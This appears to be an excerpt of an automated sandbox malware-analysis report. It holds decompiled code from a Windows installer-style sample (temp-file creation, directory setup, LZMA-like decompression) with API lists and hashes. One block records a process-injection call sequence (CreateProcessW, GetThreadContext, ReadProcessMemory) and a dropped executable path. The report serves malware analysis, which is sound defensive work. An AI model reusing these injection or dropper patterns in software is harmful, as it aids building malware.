              					if(_t17 != 0) {
              						break;
              					}
              					if(_t23 != 0) {
              						continue;
              					} else {
              						 *_t26 =  *_t26 & _t23;
              					}
              					L4:
              					return _t17;
              				}
              				_t17 = _t26;
              				goto L4;
              			}













              APIs
              • GetTickCount.KERNEL32 ref: 0040607F
              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822), ref: 0040609A
              Strings
              • "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" , xrefs: 00406061
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406066
              • nsa, xrefs: 0040606E
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CountFileNameTempTick
              • String ID: "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" $C:\Users\user\AppData\Local\Temp\$nsa
              • API String ID: 1716503409-2117798896
              • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
              • Instruction ID: f50322da3c8d1fbf3185d5aa4cbdefdd087cb84507cf15d2c2e6a21a41158221
              • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
              • Instruction Fuzzy Hash: BBF09076741204BFEB00CF59DD05E9EB7BCEBA1710F11803AFA05F7240E6B499648768
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 02F105BE
              • GetThreadContext.KERNELBASE(?,00010007), ref: 02F105E1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02F10605
              Memory Dump Source
              • Source File: 00000008.00000002.706730415.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: Process$ContextCreateMemoryReadThread
              • String ID:
              • API String ID: 2411489757-0
              • Opcode ID: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction ID: 5b6f82afa4f19e7e8ed4e9742af0cb87ba6dc42dff5e3dd75d013b1d3426825a
              • Opcode Fuzzy Hash: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction Fuzzy Hash: 6F525D35E50258EEEB60CBA4EC55BFDB7B5AF48710F50449AEA08EA2A0D7705EC0DF05
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			E004015C1(short __ebx, void* __eflags) {
              				void* _t17;
              				int _t23;
              				void* _t25;
              				signed char _t26;
              				short _t28;
              				short _t31;
              				short* _t34;
              				void* _t36;
              
              				_t28 = __ebx;
              				 *(_t36 + 8) = E00402D3E(0xfffffff0);
              				_t17 = E00405EBC(_t16);
              				_t32 = _t17;
              				if(_t17 != __ebx) {
              					do {
              						_t34 = E00405E3E(_t32, 0x5c);
              						_t31 =  *_t34;
              						 *_t34 = _t28;
              						if(_t31 != _t28) {
              							L5:
              							_t25 = E00405AF0( *(_t36 + 8));
              						} else {
              							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
              							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B0D(_t42) == 0) {
              								goto L5;
              							} else {
              								_t25 = E00405A73( *(_t36 + 8)); // executed
              							}
              						}
              						if(_t25 != _t28) {
              							if(_t25 != 0xb7) {
              								L9:
              								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
              							} else {
              								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
              								if((_t26 & 0x00000010) == 0) {
              									goto L9;
              								}
              							}
              						}
              						 *_t34 = _t31;
              						_t32 = _t34 + 2;
              					} while (_t31 != _t28);
              				}
              				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
              					_push(0xfffffff5);
              					E00401423();
              				} else {
              					E00401423(0xffffffe6);
              					E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t36 + 8));
              					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
              					if(_t23 == 0) {
              						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
              					}
              				}
              				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t36 - 4));
              				return 0;
              			}












              APIs
                • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405ECA
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                • Part of subcall function 00405A73: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
              Strings
              • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: CharNext$Directory$AttributesCreateCurrentFile
              • String ID: C:\Users\user\AppData\Local\Temp
              • API String ID: 1892508949-47812868
              • Opcode ID: dcb730f39e3dd6a344b0b4a95f59667c82559ddfc9f43997ecf154a5f55b7a43
              • Instruction ID: 804c449170a8270e91f9515fbcc2e09aef6974e60d9951be020b7c668b26977e
              • Opcode Fuzzy Hash: dcb730f39e3dd6a344b0b4a95f59667c82559ddfc9f43997ecf154a5f55b7a43
              • Instruction Fuzzy Hash: 1511E231504115ABCF30AFA5CD4199F36B0EF24329B28493BE956B12F1D63E4E829F5E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 99%
              			E00407090() {
              				signed int _t530;
              				void _t537;
              				signed int _t538;
              				signed int _t539;
              				unsigned short _t569;
              				signed int _t579;
              				signed int _t607;
              				void* _t627;
              				signed int _t628;
              				signed int _t635;
              				signed int* _t643;
              				void* _t644;
              
              				L0:
              				while(1) {
              					L0:
              					_t530 =  *(_t644 - 0x30);
              					if(_t530 >= 4) {
              					}
              					 *(_t644 - 0x40) = 6;
              					 *(_t644 - 0x7c) = 0x19;
              					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
              					while(1) {
              						L145:
              						 *(_t644 - 0x50) = 1;
              						 *(_t644 - 0x48) =  *(_t644 - 0x40);
              						while(1) {
              							L149:
              							if( *(_t644 - 0x48) <= 0) {
              								goto L155;
              							}
              							L150:
              							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
              							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
              							 *(_t644 - 0x54) = _t643;
              							_t569 =  *_t643;
              							_t635 = _t569 & 0x0000ffff;
              							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
              							if( *(_t644 - 0xc) >= _t607) {
              								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
              								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
              								_t628 = _t627 + 1;
              								 *_t643 = _t569 - (_t569 >> 5);
              								 *(_t644 - 0x50) = _t628;
              							} else {
              								 *(_t644 - 0x10) = _t607;
              								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
              								 *_t643 = (0x800 - _t635 >> 5) + _t569;
              							}
              							if( *(_t644 - 0x10) >= 0x1000000) {
              								L148:
              								_t487 = _t644 - 0x48;
              								 *_t487 =  *(_t644 - 0x48) - 1;
              								L149:
              								if( *(_t644 - 0x48) <= 0) {
              									goto L155;
              								}
              								goto L150;
              							} else {
              								L154:
              								L146:
              								if( *(_t644 - 0x6c) == 0) {
              									L169:
              									 *(_t644 - 0x88) = 0x18;
              									L170:
              									_t579 = 0x22;
              									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
              									_t539 = 0;
              									L172:
              									return _t539;
              								}
              								L147:
              								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
              								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
              								_t484 = _t644 - 0x70;
              								 *_t484 =  &(( *(_t644 - 0x70))[1]);
              								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
              								goto L148;
              							}
              							L155:
              							_t537 =  *(_t644 - 0x7c);
              							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
              							while(1) {
              								L140:
              								 *(_t644 - 0x88) = _t537;
              								while(1) {
              									L1:
              									_t538 =  *(_t644 - 0x88);
              									if(_t538 > 0x1c) {
              										break;
              									}
              									L2:
              									switch( *((intOrPtr*)(_t538 * 4 +  &M004074FE))) {
              										case 0:
              											L3:
              											if( *(_t644 - 0x6c) == 0) {
              												goto L170;
              											}
              											L4:
              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
              											_t538 =  *( *(_t644 - 0x70));
              											if(_t538 > 0xe1) {
              												goto L171;
              											}
              											L5:
              											_t542 = _t538 & 0x000000ff;
              											_push(0x2d);
              											asm("cdq");
              											_pop(_t581);
              											_push(9);
              											_pop(_t582);
              											_t638 = _t542 / _t581;
              											_t544 = _t542 % _t581 & 0x000000ff;
              											asm("cdq");
              											_t633 = _t544 % _t582 & 0x000000ff;
              											 *(_t644 - 0x3c) = _t633;
              											 *(_t644 - 0x1c) = (1 << _t638) - 1;
              											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
              											_t641 = (0x300 << _t633 + _t638) + 0x736;
              											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
              												L10:
              												if(_t641 == 0) {
              													L12:
              													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
              													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
              													goto L15;
              												} else {
              													goto L11;
              												}
              												do {
              													L11:
              													_t641 = _t641 - 1;
              													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
              												} while (_t641 != 0);
              												goto L12;
              											}
              											L6:
              											if( *(_t644 - 4) != 0) {
              												GlobalFree( *(_t644 - 4));
              											}
              											_t538 = GlobalAlloc(0x40, 0x600); // executed
              											 *(_t644 - 4) = _t538;
              											if(_t538 == 0) {
              												goto L171;
              											} else {
              												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
              												goto L10;
              											}
              										case 1:
              											L13:
              											__eflags =  *(_t644 - 0x6c);
              											if( *(_t644 - 0x6c) == 0) {
              												L157:
              												 *(_t644 - 0x88) = 1;
              												goto L170;
              											}
              											L14:
              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
              											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
              											_t45 = _t644 - 0x48;
              											 *_t45 =  *(_t644 - 0x48) + 1;
              											__eflags =  *_t45;
              											L15:
              											if( *(_t644 - 0x48) < 4) {
              												goto L13;
              											}
              											L16:
              											_t550 =  *(_t644 - 0x40);
              											if(_t550 ==  *(_t644 - 0x74)) {
              												L20:
              												 *(_t644 - 0x48) = 5;
              												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
              												goto L23;
              											}
              											L17:
              											 *(_t644 - 0x74) = _t550;
              											if( *(_t644 - 8) != 0) {
              												GlobalFree( *(_t644 - 8));
              											}
              											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
              											 *(_t644 - 8) = _t538;
              											if(_t538 == 0) {
              												goto L171;
              											} else {
              												goto L20;
              											}
              										case 2:
              											L24:
              											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
              											 *(_t644 - 0x84) = 6;
              											 *(_t644 - 0x4c) = _t557;
              											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
              											goto L132;
              										case 3:
              											L21:
              											__eflags =  *(_t644 - 0x6c);
              											if( *(_t644 - 0x6c) == 0) {
              												L158:
              												 *(_t644 - 0x88) = 3;
              												goto L170;
              											}
              											L22:
              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
              											_t67 = _t644 - 0x70;
              											 *_t67 =  &(( *(_t644 - 0x70))[1]);
              											__eflags =  *_t67;
              											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
              											L23:
              											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
              											if( *(_t644 - 0x48) != 0) {
              												goto L21;
              											}
              											goto L24;
              										case 4:
              											L133:
              											_t559 =  *_t642;
              											_t626 = _t559 & 0x0000ffff;
              											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
              											if( *(_t644 - 0xc) >= _t596) {
              												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
              												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
              												 *(_t644 - 0x40) = 1;
              												_t560 = _t559 - (_t559 >> 5);
              												__eflags = _t560;
              												 *_t642 = _t560;
              											} else {
              												 *(_t644 - 0x10) = _t596;
              												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
              												 *_t642 = (0x800 - _t626 >> 5) + _t559;
              											}
              											if( *(_t644 - 0x10) >= 0x1000000) {
              												goto L139;
              											} else {
              												goto L137;
              											}
              										case 5:
              											L137:
              											if( *(_t644 - 0x6c) == 0) {
              												L168:
              												 *(_t644 - 0x88) = 5;
              												goto L170;
              											}
              											L138:
              											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
              											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
              											L139:
              											_t537 =  *(_t644 - 0x84);
              											L140:
              											 *(_t644 - 0x88) = _t537;
              											goto L1;
              										case 6:
              											L25:
              											__edx = 0;
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												L36:
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x34) = 1;
              												 *(__ebp - 0x84) = 7;
              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
              												goto L132;
              											}
              											L26:
              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
              											__esi =  *(__ebp - 0x60);
              											__cl = 8;
              											__cl = 8 -  *(__ebp - 0x3c);
              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              											__ecx =  *(__ebp - 0x3c);
              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              											__ecx =  *(__ebp - 4);
              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              											__eflags =  *(__ebp - 0x38) - 4;
              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              											if( *(__ebp - 0x38) >= 4) {
              												__eflags =  *(__ebp - 0x38) - 0xa;
              												if( *(__ebp - 0x38) >= 0xa) {
              													_t98 = __ebp - 0x38;
              													 *_t98 =  *(__ebp - 0x38) - 6;
              													__eflags =  *_t98;
              												} else {
              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              												}
              											} else {
              												 *(__ebp - 0x38) = 0;
              											}
              											__eflags =  *(__ebp - 0x34) - __edx;
              											if( *(__ebp - 0x34) == __edx) {
              												L35:
              												__ebx = 0;
              												__ebx = 1;
              												goto L61;
              											} else {
              												L32:
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__ecx =  *(__ebp - 8);
              												__ebx = 0;
              												__ebx = 1;
              												__al =  *((intOrPtr*)(__eax + __ecx));
              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              												goto L41;
              											}
              										case 7:
              											L66:
              											__eflags =  *(__ebp - 0x40) - 1;
              											if( *(__ebp - 0x40) != 1) {
              												L68:
              												__eax =  *(__ebp - 0x24);
              												 *(__ebp - 0x80) = 0x16;
              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
              												__eax =  *(__ebp - 0x28);
              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
              												__eax =  *(__ebp - 0x2c);
              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              												__al = __al & 0x000000fd;
              												__eax = (__eflags >= 0) - 1 + 0xa;
              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
              												__eax =  *(__ebp - 4);
              												__eax =  *(__ebp - 4) + 0x664;
              												__eflags = __eax;
              												 *(__ebp - 0x58) = __eax;
              												goto L69;
              											}
              											L67:
              											__eax =  *(__ebp - 4);
              											__ecx =  *(__ebp - 0x38);
              											 *(__ebp - 0x84) = 8;
              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
              											goto L132;
              										case 8:
              											L70:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x84) = 0xa;
              												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
              											} else {
              												__eax =  *(__ebp - 0x38);
              												__ecx =  *(__ebp - 4);
              												__eax =  *(__ebp - 0x38) + 0xf;
              												 *(__ebp - 0x84) = 9;
              												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
              											}
              											goto L132;
              										case 9:
              											L73:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												goto L90;
              											}
              											L74:
              											__eflags =  *(__ebp - 0x60);
              											if( *(__ebp - 0x60) == 0) {
              												goto L171;
              											}
              											L75:
              											__eax = 0;
              											__eflags =  *(__ebp - 0x38) - 7;
              											_t259 =  *(__ebp - 0x38) - 7 >= 0;
              											__eflags = _t259;
              											0 | _t259 = _t259 + _t259 + 9;
              											 *(__ebp - 0x38) = _t259 + _t259 + 9;
              											goto L76;
              										case 0xa:
              											L82:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												L84:
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x84) = 0xb;
              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
              												goto L132;
              											}
              											L83:
              											__eax =  *(__ebp - 0x28);
              											goto L89;
              										case 0xb:
              											L85:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__ecx =  *(__ebp - 0x24);
              												__eax =  *(__ebp - 0x20);
              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
              											} else {
              												__eax =  *(__ebp - 0x24);
              											}
              											__ecx =  *(__ebp - 0x28);
              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
              											L89:
              											__ecx =  *(__ebp - 0x2c);
              											 *(__ebp - 0x2c) = __eax;
              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              											L90:
              											__eax =  *(__ebp - 4);
              											 *(__ebp - 0x80) = 0x15;
              											__eax =  *(__ebp - 4) + 0xa68;
              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
              											goto L69;
              										case 0xc:
              											L99:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												L164:
              												 *(__ebp - 0x88) = 0xc;
              												goto L170;
              											}
              											L100:
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t334 = __ebp - 0x70;
              											 *_t334 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t334;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											__eax =  *(__ebp - 0x2c);
              											goto L101;
              										case 0xd:
              											L37:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												L159:
              												 *(__ebp - 0x88) = 0xd;
              												goto L170;
              											}
              											L38:
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t122 = __ebp - 0x70;
              											 *_t122 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t122;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L39:
              											__eax =  *(__ebp - 0x40);
              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              												goto L48;
              											}
              											L40:
              											__eflags = __ebx - 0x100;
              											if(__ebx >= 0x100) {
              												goto L54;
              											}
              											L41:
              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              											__ecx =  *(__ebp - 0x58);
              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              											 *(__ebp - 0x48) = __eax;
              											__eax = __eax + 1;
              											__eax = __eax << 8;
              											__eax = __eax + __ebx;
              											__esi =  *(__ebp - 0x58) + __eax * 2;
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              											__ax =  *__esi;
              											 *(__ebp - 0x54) = __esi;
              											__edx = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												 *(__ebp - 0x40) = 1;
              												__cx = __ax >> 5;
              												__eflags = __eax;
              												__ebx = __ebx + __ebx + 1;
              												 *__esi = __ax;
              											} else {
              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edx;
              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              												__ebx = __ebx + __ebx;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											 *(__ebp - 0x44) = __ebx;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L39;
              											} else {
              												L45:
              												goto L37;
              											}
              										case 0xe:
              											L46:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												L160:
              												 *(__ebp - 0x88) = 0xe;
              												goto L170;
              											}
              											L47:
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t156 = __ebp - 0x70;
              											 *_t156 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t156;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											while(1) {
              												L48:
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													break;
              												}
              												L49:
              												__eax =  *(__ebp - 0x58);
              												__edx = __ebx + __ebx;
              												__ecx =  *(__ebp - 0x10);
              												__esi = __edx + __eax;
              												__ecx =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													_t170 = __edx + 1; // 0x1
              													__ebx = _t170;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													continue;
              												} else {
              													L53:
              													goto L46;
              												}
              											}
              											L54:
              											_t173 = __ebp - 0x34;
              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
              											__eflags =  *_t173;
              											goto L55;
              										case 0xf:
              											L58:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												L161:
              												 *(__ebp - 0x88) = 0xf;
              												goto L170;
              											}
              											L59:
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t203 = __ebp - 0x70;
              											 *_t203 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t203;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L60:
              											__eflags = __ebx - 0x100;
              											if(__ebx >= 0x100) {
              												L55:
              												__al =  *(__ebp - 0x44);
              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              												goto L56;
              											}
              											L61:
              											__eax =  *(__ebp - 0x58);
              											__edx = __ebx + __ebx;
              											__ecx =  *(__ebp - 0x10);
              											__esi = __edx + __eax;
              											__ecx =  *(__ebp - 0x10) >> 0xb;
              											__ax =  *__esi;
              											 *(__ebp - 0x54) = __esi;
              											__edi = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
